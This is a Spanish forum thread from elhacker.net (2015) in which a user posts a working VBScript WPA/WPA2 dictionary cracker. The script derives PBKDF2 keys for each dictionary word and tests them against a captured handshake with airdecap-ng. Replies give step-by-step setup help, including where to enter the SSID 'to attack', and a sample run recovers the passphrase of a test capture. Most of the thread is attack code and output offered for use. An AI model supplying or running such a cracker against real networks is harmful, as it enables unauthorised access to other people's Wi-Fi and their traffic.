elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  WPA crackeador con diccionario
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: WPA crackeador con diccionario  (Leído 7,231 veces)
Heolo

Desconectado Desconectado

Mensajes: 16


Ver Perfil
WPA crackeador con diccionario
« en: 12 Mayo 2015, 16:00 pm »

Hola mis queridos colegas !!

Bueno, tenia mucho tiempo que no andaba por aqui, pero bueno, en los ultimos dias he estado programando un pequeño script en vbs el cual me ha dado buenos resultados es rapido y no consume CPU, ni memoria como el ya conocido aircrack, se me ocurrio hacelo de esta manera ( cosas de locos, ya saben )
aqui les dejo el codigo si alguien puede perfeccionarlo pues mucho mejor,[/img][/img][/img] requisitos :

airdecap-ng (librerias)
ChilkatAx-9.5.0-win32.zip ( http://www.chilkatsoft.com/download/9.5.0.49/ChilkatAx-9.5.0-win32.zip )
diccionario y dale pedale.....

Código
  1. Dim fso, outFile, variable, pw, tama
  2.  
  3. ' abre el diccionario
  4. acum = 0
  5. const ForReading = 1
  6. Set objFSO = CreateObject("Scripting.FileSystemObject")
  7. Set objTextFile = objFSO.OpenTextFile _
  8. ("f:\wpa2\clarohauwai-3.txt", ForReading)
  9. start_time = time()
  10.  
  11. ' empieza a recorrer el diccionario
  12. Do Until objTextFile.AtEndOfStream
  13. strNextLine = objTextFile.Readline
  14. arrServiceList = Split(strNextLine)
  15.  
  16. Set crypt = CreateObject("Chilkat_9_5_0.Crypt2")
  17. success = crypt.UnlockComponent("pepe")
  18. If (success <> 1) Then
  19.    outFile.WriteLine(crypt.LastErrorText)
  20.    WScript.Quit
  21. End If
  22.  
  23. '  pasada del diccionario WPA passphrase
  24. pw = arrServiceList(0)          'Induction
  25. pwCharset = "ansi"
  26. acum = acum + 1
  27.  
  28. '  Hash algoritmo: sha1, md2, md5, etc.
  29. hashAlg = "sha1"
  30.  
  31. ' ssid y lo convierte a hex
  32. strString = "Claro_xxxx"     'Coherer
  33. strHex =""
  34. For i=1 To Len(strString)
  35.    strHex = strHex + Hex(Asc(Mid(strString,i,1)))
  36. Next
  37.  
  38. ' asigna la variable a ssidHex
  39. ssidHex = strHex
  40.  
  41. '  la WPA key calcula 4096 interaciones.
  42. iterationCount = 4096
  43. outputBitLen = 256
  44. enc = "hex"
  45.  
  46. start_time2 = time()
  47.  
  48. ' reliza el calculo del hash
  49. wpaHexKey = crypt.Pbkdf2(pw,pwCharset,hashAlg,ssidHex,iterationCount,outputBitLen,enc)
  50.  
  51. ' llama el airdecap y le envia el hash calculado
  52. Set WshShell = CreateObject("WScript.Shell")
  53. Return = WshShell.Run("f:\wpa2\airdecap-ng.exe -l -k " & wpaHexKey & " -e " & strString & " F:\WPA2\rules\Claro_xxxx.cap",0, True)
  54.  
  55. ' imprime variables
  56.  WScript.echo "SSID        :", strString  ,            "                     | Cantidad:",acum
  57.  WScript.Echo "------------------------------------------------------------------------------"
  58.  WScript.echo "CLAVE       :", pw
  59.  WScript.Echo "------------------------------------------------------------------------------"
  60.  WScript.echo "WPA PMK     :", wpaHexKey
  61.  WScript.Echo "------------------------------------------------------------------------------"
  62.  
  63. ' determina el size del archivo que genera el airdecap
  64. filename = ("F:\WPA2\rules\Claro_xxxx-dec.cap")
  65. Set fso = CreateObject("Scripting.FileSystemObject")
  66. Set f = fso.GetFile(filename)
  67. tama = f.Size
  68.  
  69. ' si el archivo -dec.cap es alterado, ocea cuando se le envia el hash entonces....blablabla
  70. If tama > 24 Then
  71.   WScript.Echo " "
  72.   WScript.Echo "========================================"
  73.   WScript.Echo " "
  74.   WScript.Echo "Clave desifrada 100% :", pw
  75.   WScript.Echo " "
  76.   WScript.Echo "========================================"
  77.   Exit do
  78.  
  79. End If
  80.  
  81.  
  82. Loop
  83.  
  84. 'airdecap-ng -k A288FCF0CAAACDA9A9F58633FF35E8992A01D9C10BA5E02EFDF8CB5D730CE7BC -e Coherer wpa-Induction.pcap | find "decrypted WPA"

Suerte !!!!

Mod: Los códigos deben ir en GeSHi


« Última modificación: 12 Mayo 2015, 19:56 pm por engel lex » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.087



Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #1 en: 12 Mayo 2015, 16:22 pm »

Gracias por el aporte Heolo, pero esto como se ejecuta en Wifislax por ejemplo se supone que este programa es para descifrar claves Wpa metiendo antes el handshake ? o haces un diccionario y craquear ? No me ha quedado muy claro, perdona.


« Última modificación: 12 Mayo 2015, 16:24 pm por El_Andaluz » En línea

Heolo

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #2 en: 12 Mayo 2015, 16:37 pm »

ahhh, no fijate es un vbscript bajo DOS, es algo simple, como puedes ver aun no esta terminado pero funciona, solo debes colocar la ruta del diccionario, poner el nombre del ssid y el nombre del archivo que genera el airdecap-ng y el nombre del handshake es algo simple....
« Última modificación: 12 Mayo 2015, 16:39 pm por Heolo » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.087



Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #3 en: 12 Mayo 2015, 16:42 pm »

Citar
ahhh,, no fijate es un vbscript bajo DOS, es algo simple, como puedes ver aun no esta terminado pero funciona, solo debes colocar la ruta del diccionario, poner el nombre del ssid y el nombre del archivo que genera el airdecap-ng es algo simple....

Han vale que no lo has terminado pero puede funcionar bien para crackear lo he probado en Windows7 pero me salta un mensaje de error no se algo habré hecho mal después he leído el reamed pero esta todo en ingles y al verdad que yo de ingles estoy cortito, puede hacer un vídeo o poner en imagines los pasos a seguir para hacerlo bien si no te importa. Muchas gracias.
En línea

Heolo

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #4 en: 12 Mayo 2015, 17:04 pm »

Te comento que aun no esta terminado pues falta ponerlo para pasarles arugumentos, como el nombre de diccionario, el archivo cap el nomebre del ssid.

como comente al principio, debes tener en el archivo airedecap-ng.exe y sus respectivas dll, como por igual la dll del programa ChilkatAx-9.5.0-win32.zip del cual puse el link todos estos conjunto con el diccionario deben estar en una misma carpeta :

( Aqui pones la ruta del diccionario o mejor si esta en la misma carpeta :)
----------------------------------------------------
' abre el diccionario
acum = 0
const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _("f:\wpa2\clarohauwai-3.txt", ForReading)
start_time = time()
------------------------------------------------------------------
( Aqui colocas en la variable strString el ssid a atacar )

' ssid y lo convierte a hex
strString = "Claro_xxxx"     'Coherer
strHex =""
For i=1 To Len(strString)
    strHex = strHex + Hex(Asc(Mid(strString,i,1)))
Next
-------------------------------------------------------------------

( Aqui colocas el nombre del handshake el mio aqui es Claro_xxx.cap )

' llama el airdecap y le envia el hash calculado
Set WshShell = CreateObject("WScript.Shell")
Return = WshShell.Run("f:\wpa2\airdecap-ng.exe -l -k " & wpaHexKey & " -e " & strString & " F:\WPA2\rules\Claro_xxx.cap",0, True)
--------------------------------------------------------------------------------------

( y por ultimo el nombre de archivo que genera el airdecap-ng al pasarle el hash que hemos calculado, el mio aqui es : Claro_xxxx-dec.cap)
---------------------------------------------------------------------------------------
' determina el size del archivo que genera el airdecap
filename = ("F:\WPA2\rules\Claro_xxxx-dec.cap")
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(filename)
tama = f.Size

Esto es todo, debe funcionar,

Saludos !!!!
En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.087



Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #5 en: 12 Mayo 2015, 17:20 pm »

Me sigue saltando un erro no se por que lo que hago mal te comento el mensaje que me salga dice lo siguiente: Error: El componente Activex no puede crear el objeto: Chikat_9_5_0.Crypt2.

Origen: Error de Microft VBScript en tiempo de ejecución. No se como ejecutarlo en windows7 me salta esos errores que te digo.

Entones me tengo que descargar el archivo airedecap-ng.exe y sus respectivas dlll donde me puede descargar eso para que me funcione todo es que no lo veo dentro de la carpeta que pusiste los siento soy muy torpe.
« Última modificación: 12 Mayo 2015, 17:22 pm por El_Andaluz » En línea

Heolo

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #6 en: 12 Mayo 2015, 17:40 pm »

Es simple, en la carpeta Chikat_9_5_0.Crypt2.  exite un archivo (register_win32.bat), permite que actives la dll, ejecutalo si es 32 o 64 dependiento recuerda que deben estar las dll en la caperta., ahh el archivo airedecap-ng esta en aircrack para windows
descargalo y alli viene...

Suerte
« Última modificación: 12 Mayo 2015, 17:43 pm por Heolo » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.087



Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #7 en: 12 Mayo 2015, 23:52 pm »

Citar
Es simple, en la carpeta Chikat_9_5_0.Crypt2.  exite un archivo (register_win32.bat), permite que actives la dll, ejecutalo si es 32 o 64 dependiento recuerda que deben estar las dll en la caperta., ahh el archivo airedecap-ng esta en aircrack para windows
descargalo y alli viene...

Mi portátil es de 32 bit osea me viene bien bueno probare como me dices a ver si tengo suerte y ya te comentare. Gracias
En línea

Heolo

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: WPA crackeador con diccionario
« Respuesta #8 en: 14 Mayo 2015, 03:44 am »

Hola !!!

Por aqui les envio una prueba realzada, al termino para los que esten interesados le pondre un link para la descarga : Saludos

F:\WPA2>Hashpmk-dh
Hashpmk-dh 1.0 -(C) 2015-2016 by Heolo

use: hashpmk-dh <ssid> <diccionario> <handshake>

Opciones :

 ssid        : nombre del identificador wifi
 diccionario : nombre del diccionario
 handshake   : archivo handshake (cap, pcap..etc)


F:\WPA2>Hashpmk-dh Coherer clarohauwai-1.txt wpa-Induction.pcap

Probando : 1 : SBUGHWAP1O50M : 5CF1CA924A101D096F94ACC8F76B116F1A58A04F1640FBAAEF613B2719A1FE0E

Probando : 2 : T6QDMARP30ZLI : 3DEA1D4F48BB61CB333EAAEA08E5513E8FFF5B171346813E1FB9F563B436C30F

Probando : 3 : 8EQD0UFIKJZMW : 61EEA069DF2E6278981CB376F6B488C0E4B0CBA2E579CD4AE4763DBD6842B6F3

Probando : 4 : A2LNWCVFUEK09 : F826BC49F875BD239D50DEFC3644050188F022E4E0195F5B3058AAA86B7F3B45

Probando : 5 : O6V7WP3DMS49H : 8357E06064FB338858ACA04AD38CB5BEB84215D4EB892FD3CF640031AE427C16

Probando : 6 : CBTR632OP7A48 : 02AC460A59980BA10E29BA343EF1D1A4F7B6126073CC7F2727961118FFF1D7D3

Probando : 7 : DNOR58SMEQZT7 : D6057C7C874D9DFB3135E0FFD855AD89EC2FDF63A24790E82948F42021ED26AB

Probando : 8 : 801AB5QCLDUKE : E0663F7AA9A26792FF6D10E3DB690FD179727A04285380D8CC24CBBFB8EE7A17

Probando : 9 : TFQ9H4OEVKML5 : D4BDF6FB1BF4FFD6F181BEE2B59C7EA48FBC259585C58B8F694F6159AF484464

Probando : 10 : V8JG7NSYEM23T : DB6DDFFF837F832D45A2BEEBF8E5BD27DD97BE7E3DEF794E2581DC13F65B5087

Probando : 11 : NUZHI1EP3A5YV : 65565E8DCAD7AC4B25AD0F38E9BD69E1E59BCD38424AEFA5E76F018A68CE2417

Probando : 12 : FY2OE9IJ3T5S8 : 8B3793E8C6D1161F9D0AB5341C797F45A53EDC6FD9DE45415AD8F85E73A5BAF8

Probando : 13 : WD34OMB7E2VC8 : 8692071F8352BF635FB102B163C55DE6F2331BA2587CD1D68312F074813A1D5C

Probando : 14 : P8GWHERV7QM1S : F3A42C93D21FF2AA1BCE21CE50DA133D30E4C19AEC1F709ED8C02811965E66E2

Probando : 15 : VCJZWR8ITBP7Q : 04562BE35439729812A8944F662D18E6AF713ECDD0B0CB7C478A245AE6694891

Probando : 16 : TJF49BK2MO506 : 5C331FB35AA8730673E46DC91C5A007B80C60EAA43D43941E6E182255248BF78

Probando : 17 : VIY3A6PJ02GB7 : B7EFF16FED66A72CA75BE07B7A6B267FE206EB2451CBA33AA0A67B7BD7B84E37

Probando : 18 : 4609WB2YVM8LI : AAA1CAFB697A930F762B7244EA6A731B8DEE7435CA0FC8EA1AF0929831352A9F

Probando : 19 : V3EDHL1KJRCAQ : 9CD0C1255E4D43802A71A26B62391CA26F03C881BD3437F8C97C839CE349ABA6

Probando : 20 : 35IKWYEC906OB : 1D697F3CB4FAE9C053CF31F83448BA140D06664A406F7800A7FD8815FA8766ED

Probando : 21 : 689KSL7JD0RVU : 7A0AFBE227A50557F32830792B2AF0E5A055DBDA803C72C68C82EC8484B21887

Probando : 22 : YNKSA9UH8J7OI : E1382F001D7ABB0855262F6385250142A4D98841A5045DC87FCFC21C69D787CB

Probando : 23 : MZNG4PTIV8HRE : 72736C07F0210A03486E5647BAA43221CC5994516C387F4D95EF07D24516C994

Probando : 24 : 6F0P75AJWQRIM : 37B769A43073AF46990EE61D7AE59DDAA5ED1DAAF270D8B6A666A8BC64409676

Probando : 25 : 0WU4Y6KPVMI1C : 9F9675D1C3B75470F6848567E59808192CAE220D0CB57C58837FD8780D2EBF93

Probando : 26 : Induction : A288FCF0CAAACDA9A9F58633FF35E8992A01D9C10BA5E02EFDF8CB5D730CE7BC

-------------------------------

Ssid :Coherer

Clave desifrada 100% :Induction

-------------------------------
« Última modificación: 14 Mayo 2015, 03:54 am por Heolo » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Crackeador en VB, como?? « 1 2 »
Programación Visual Basic
Hendrix 18 5,060 Último mensaje 17 Abril 2006, 21:15 pm
por Meg
web crackeador o injector vb6
Programación Visual Basic
xakalw00f 0 1,605 Último mensaje 28 Mayo 2008, 04:40 am
por xakalw00f
Crackeador MD5 por Diccionario [PYTHON]
Scripting
[ANTRAX] 0 2,768 Último mensaje 3 Septiembre 2010, 16:11 pm
por [ANTRAX]
[BATCH] Crackeador de FTP en .bat
Scripting
AlxSpy 6 4,952 Último mensaje 27 Mayo 2011, 01:14 am
por kiriost
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines